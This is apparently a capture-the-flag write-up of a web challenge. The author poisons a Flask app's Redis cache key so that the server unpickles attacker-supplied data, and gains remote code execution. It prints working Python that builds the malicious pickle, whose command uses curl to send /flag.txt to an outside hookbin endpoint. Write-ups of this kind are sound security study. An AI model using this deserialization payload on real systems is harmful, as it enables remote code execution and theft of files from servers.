Web [300 pts]
Description: cache all the things (this is python3)
This challenge provides us with source code:
We see that their server is using Redis for caching and flask_caching library. Looking at the form, we see that each input is treated as a key (title) and value (content). Looking into the cache functions, I found this source to be helpful for the challenge:
It appears the default key when using cache functions in flask is “flask_cache_view/<path>” , so we can temporarily store malicious values in one of the keys that Redis is using. From the above link, it states that having a
b'!' in front of a pickled object will lead to RedisCache unpickling. This can lead to RCE.
So we craft our pickle object with our exploit and append a
b'!' in front of it. The description says it is in Python3 so we make sure to serialize our object in Python3.
import pickle import os exp = open("exploit", "wb") exp.write(b'!') class RCE(dict): def __reduce__(self): cmd = ("curl -X POST -H 'Content-Type: application/json' -d '@/flag.txt' https://hookb.in/9XgpbdRPnDS600eMoRR6") return os.system, (cmd,) exp.write(pickle.dumps(RCE())) exp.close()
There are multiple ways to get the flag, I just curled the flag in POST data to my hookbin, our input will look like this:
After sending this and visiting /test24, we notice there is a delay, which means our object was deserialized. Looking at our hookbin, we see the flag came through: